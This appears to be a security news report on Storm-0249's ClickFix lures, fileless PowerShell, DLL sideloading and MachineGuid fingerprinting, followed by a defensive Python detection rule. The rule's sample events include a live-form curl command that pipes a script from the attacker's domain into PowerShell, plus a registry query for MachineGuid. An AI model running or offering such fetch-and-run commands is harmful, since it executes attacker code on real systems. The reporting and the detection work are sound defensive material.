Ransomware Rampage: Storm-0249 Strikes with ClickFix, Fileless PowerShell, and DLL Sideloading

The group identified as Storm-0249 appears to be transitioning from acting as an initial access broker to utilizing more sophisticated techniques such as domain spoofing, DLL side-loading, and fileless PowerShell execution to carry out ransomware attacks.

These advanced methods enable the threat actor to evade security measures, infiltrate networks, maintain a presence, and operate without detection, posing significant challenges to cybersecurity teams, according to a report by ReliaQuest shared with The Hacker News.

Referred to as Storm-0249 by Microsoft, this initial access broker has been selling entry points into organizations to various cybercrime groups, including ransomware and extortion actors like Storm-0501, since it was first brought to attention in September 2024.

Earlier this year, Microsoft disclosed details of a phishing campaign orchestrated by Storm-0249, using tax-related themes to target U.S. users prior to the tax season, infecting them with Latrodectus and the BruteRatel C4 (BRc4) post-exploitation framework.

The ultimate objective of these attacks is to establish persistent access to enterprise networks and sell them to ransomware groups, streamlining the process of targeting and executing ransomware attacks.

Recent revelations from ReliaQuest indicate a shift in tactics, as Storm-0249 now employs the ClickFix social engineering technique to deceive potential victims into running malicious commands through the Windows Run dialog, under the guise of resolving technical issues.

The command uses the legitimate “curl.exe” to fetch a PowerShell script from a URL that mimics a Microsoft domain in its path (“sgcipl[.]com/us.microsoft.com/bdo/”); the script is then passed straight to PowerShell and executed in a fileless manner, so no script file is written to disk.

This leads to the deployment of a malicious MSI package with SYSTEM privileges, which drops a trojanized DLL named after a component of SentinelOne’s endpoint security agent (“SentinelAgentCore.dll”) into the user’s AppData folder, alongside the legitimate “SentinelAgentWorker.exe” executable.

The rogue DLL is then sideloaded when the “SentinelAgentWorker.exe” process is initiated, enabling covert operations. The DLL establishes encrypted communication with a command-and-control (C2) server.

Storm-0249 has also been using legitimate Windows administrative utilities such as reg.exe and findstr.exe to extract unique system identifiers like MachineGuid, laying the groundwork for subsequent ransomware attacks. Because these are living-off-the-land (LotL) tools and the commands run under the trusted “SentinelAgentWorker.exe” process, the activity blends in with normal agent behaviour and can go undetected.
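As an added example (not code from the ReliaQuest or Microsoft reports), the following detection logic runs over constructed process-creation events and flags the two telemetry patterns described above: curl.exe launched from the Run dialog (explorer.exe parent) to fetch a path-spoofed Microsoft URL into PowerShell, and reg.exe or findstr.exe reading MachineGuid under a SentinelAgentWorker.exe that runs from AppData rather than its install directory. The event field names, the sample command lines, the user path and the vendor install path are assumptions.

```python
import re

# Constructed sample process-creation events. Field names follow Sysmon
# Event ID 1 as an assumption; the values are made up, not from the report.
EVENTS = [
    {  # ClickFix: Run dialog (explorer.exe) launches curl piped into PowerShell
        "Image": r"C:\Windows\System32\curl.exe",
        "CommandLine": r"curl.exe -s https://sgcipl.com/us.microsoft.com/bdo/ | powershell -",
        "ParentImage": r"C:\Windows\explorer.exe"},
    {  # LotL fingerprinting under the sideloaded worker running from AppData
        "Image": r"C:\Windows\System32\reg.exe",
        "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid",
        "ParentImage": r"C:\Users\alice\AppData\Local\Temp\SentinelAgentWorker.exe"},
    {  # Same query from the (assumed) vendor install path: baseline, no alert
        "Image": r"C:\Windows\System32\reg.exe",
        "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid",
        "ParentImage": r"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentWorker.exe"},
]

# URL whose *path* carries a microsoft.com hostname while the real host is elsewhere.
SPOOFED_MS_PATH = re.compile(r"https?://([^/\s]+)/\S*microsoft\.com", re.IGNORECASE)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect_clickfix(ev):
    """explorer.exe -> curl.exe fetching a path-spoofed Microsoft URL into PowerShell."""
    cmd = ev["CommandLine"]
    m = SPOOFED_MS_PATH.search(cmd)
    return (basename(ev["ParentImage"]) == "explorer.exe"
            and basename(ev["Image"]) == "curl.exe"
            and m is not None and not m.group(1).lower().endswith("microsoft.com")
            and "powershell" in cmd.lower())

def detect_machineguid_under_sideload(ev):
    """reg/findstr reading MachineGuid, parent named like the EDR worker but in AppData."""
    parent = ev["ParentImage"]
    return (basename(ev["Image"]) in ("reg.exe", "findstr.exe")
            and "machineguid" in ev["CommandLine"].lower()
            and basename(parent) == "sentinelagentworker.exe"
            and "\\appdata\\" in parent.lower())

def scan(events):
    """Return (rule, event index) pairs for every event a rule fires on."""
    rules = {"clickfix_curl_powershell": detect_clickfix,
             "machineguid_from_appdata_sideload": detect_machineguid_under_sideload}
    return [(name, i) for i, ev in enumerate(events)
            for name, rule in rules.items() if rule(ev)]
```

The third event shows why the parent's directory matters: the same MachineGuid query from the agent's real install path is expected behaviour, and alerting only on the AppData copy keeps the rule from flooding analysts with vendor noise.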

These findings suggest a departure from widespread phishing campaigns to targeted attacks that exploit the trust associated with signed processes to enhance stealth.

According to ReliaQuest, this strategic shift indicates preparation for ransomware affiliates, citing groups like LockBit and ALPHV that utilize MachineGuid to bind encryption keys to individual victim systems.

By associating encryption keys with MachineGuid, attackers ensure that even if the ransomware binary is intercepted or encryption algorithms are reverse-engineered, files cannot be decrypted without the attacker-controlled key.
